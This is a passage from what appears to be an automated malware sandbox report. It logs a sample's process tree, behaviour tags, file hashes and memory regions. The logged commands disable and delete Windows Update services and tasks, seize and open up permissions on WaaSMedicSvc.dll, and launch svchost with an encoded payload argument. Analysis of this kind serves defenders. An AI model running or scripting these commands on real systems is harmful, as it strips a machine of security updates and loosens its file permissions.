"\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/532-267-0x000002DD26AF0000-0x000002DD26AFA000-memory.dmpFilesize
40KB
-
memory/532-234-0x000002DD26EC0000-0x000002DD26F79000-memory.dmpFilesize
740KB
-
memory/532-213-0x0000000000000000-mapping.dmp
-
memory/532-228-0x000002DD26AD0000-0x000002DD26AEC000-memory.dmpFilesize
112KB
-
memory/1336-372-0x0000000000000000-mapping.dmp
-
memory/1340-169-0x0000000000000000-mapping.dmp
-
memory/1388-194-0x0000000000000000-mapping.dmp
-
memory/1536-376-0x0000000000000000-mapping.dmp
-
memory/1540-173-0x0000000000000000-mapping.dmp
-
memory/1676-133-0x0000000000000000-mapping.dmp
-
memory/1676-141-0x000002031C440000-0x000002031C4B6000-memory.dmpFilesize
472KB
-
memory/1676-138-0x0000020303FF0000-0x0000020304012000-memory.dmpFilesize
136KB
-
memory/1820-388-0x0000000000000000-mapping.dmp
-
memory/1860-190-0x0000000000000000-mapping.dmp
-
memory/1956-373-0x0000000000000000-mapping.dmp
-
memory/2128-365-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2128-370-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2128-366-0x0000000000401BEA-mapping.dmp
-
memory/2300-118-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/2456-124-0x0000014733E10000-0x000001473422C000-memory.dmpFilesize
4.1MB
-
memory/2456-128-0x0000014718DC0000-0x00000147191DC000-memory.dmpFilesize
4.1MB
-
memory/2716-171-0x0000000000000000-mapping.dmp
-
memory/2724-192-0x0000000000000000-mapping.dmp
-
memory/2744-191-0x0000000000000000-mapping.dmp
-
memory/2884-374-0x0000000000000000-mapping.dmp
-
memory/3000-396-0x0000000000000000-mapping.dmp
-
memory/3236-195-0x0000000000000000-mapping.dmp
-
memory/3312-197-0x0000000000000000-mapping.dmp
-
memory/3472-200-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/3644-386-0x0000000000000000-mapping.dmp
-
memory/3740-132-0x0000000000000000-mapping.dmp
-
memory/3992-212-0x0000000000000000-mapping.dmp
-
memory/4108-362-0x0000000000000000-mapping.dmp
-
memory/4112-363-0x0000000000000000-mapping.dmp
-
memory/4216-375-0x000001EAB9F30000-0x000001EAB9F42000-memory.dmpFilesize
72KB
-
memory/4216-364-0x000001EAB9F00000-0x000001EAB9F06000-memory.dmpFilesize
24KB
-
memory/4264-371-0x0000000000000000-mapping.dmp
-
memory/4320-358-0x0000000000000000-mapping.dmp
-
memory/4340-184-0x0000000000000000-mapping.dmp
-
memory/4380-406-0x000001A8DE740000-0x000001A8DE746000-memory.dmpFilesize
24KB
-
memory/4380-409-0x000001A8DE020000-0x000001A8DE027000-memory.dmpFilesize
28KB
-
memory/4384-174-0x0000000000000000-mapping.dmp
-
memory/4408-359-0x0000000000000000-mapping.dmp
-
memory/4412-387-0x0000000000000000-mapping.dmp
-
memory/4420-392-0x0000000000000000-mapping.dmp
-
memory/4424-389-0x0000000000000000-mapping.dmp
-
memory/4496-170-0x0000000000000000-mapping.dmp
-
memory/4516-379-0x0000000000000000-mapping.dmp
-
memory/4540-390-0x0000000000000000-mapping.dmp
-
memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4544-381-0x000000014036DB84-mapping.dmp
-
memory/4544-410-0x000001E0049E0000-0x000001E004A00000-memory.dmpFilesize
128KB
-
memory/4544-384-0x000001E004920000-0x000001E004940000-memory.dmpFilesize
128KB
-
memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4544-400-0x000001E004980000-0x000001E0049C0000-memory.dmpFilesize
256KB
-
memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4556-391-0x0000000000000000-mapping.dmp
-
memory/4560-377-0x0000000000000000-mapping.dmp
-
memory/4576-181-0x0000000000000000-mapping.dmp
-
memory/4580-395-0x0000000000000000-mapping.dmp
-
memory/4700-172-0x0000000000000000-mapping.dmp
-
memory/4708-176-0x0000000000000000-mapping.dmp
-
memory/4732-177-0x0000000000000000-mapping.dmp
-
memory/4744-361-0x0000000000000000-mapping.dmp
-
memory/4748-360-0x0000000000000000-mapping.dmp
-
memory/4856-175-0x0000000000000000-mapping.dmp
-
memory/4912-178-0x0000000000000000-mapping.dmp
-
memory/4912-393-0x0000000000000000-mapping.dmp
-
memory/4932-179-0x0000000000000000-mapping.dmp
-
memory/4936-394-0x0000000000000000-mapping.dmp
-
memory/4940-180-0x0000000000000000-mapping.dmp
-
memory/4956-182-0x0000000000000000-mapping.dmp
-
memory/4968-183-0x0000000000000000-mapping.dmp
-
memory/4988-185-0x0000000000000000-mapping.dmp
-
memory/5004-186-0x0000000000000000-mapping.dmp
-
memory/5024-187-0x0000000000000000-mapping.dmp
-
memory/5064-188-0x0000000000000000-mapping.dmp
-
memory/5100-189-0x0000000000000000-mapping.dmp
-
memory/5112-193-0x0000000000000000-mapping.dmp